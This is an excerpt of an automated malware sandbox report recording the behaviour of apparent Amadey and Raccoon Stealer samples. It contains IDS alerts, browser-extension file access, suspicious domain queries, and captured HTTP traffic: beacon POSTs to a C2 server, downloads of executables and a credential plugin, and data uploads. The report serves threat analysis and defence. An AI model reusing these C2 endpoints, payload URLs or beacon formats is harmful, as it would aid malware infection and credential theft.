                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: fltLib.pdb&6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
                          Source: Binary string: C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49887 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49902 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49905 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49916 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49950 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\explorer.exeDomain query: pool.supportxmr.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.212.0 25
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 8.209.67.104 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----aea6c0e437f81733b7ee77dd06981aeaHost: 185.215.113.35Content-Length: 83351Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /3.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.163.204.24
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /advert.msi HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /File.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /123.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /442.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /512412.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /443.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/aaef434f5519a28dfcee0c61d66234f26ec46162 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /RM.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b06fcd66668bd01f7f6369d95074ea8dHost: 185.215.113.35Content-Length: 96982Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:12 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
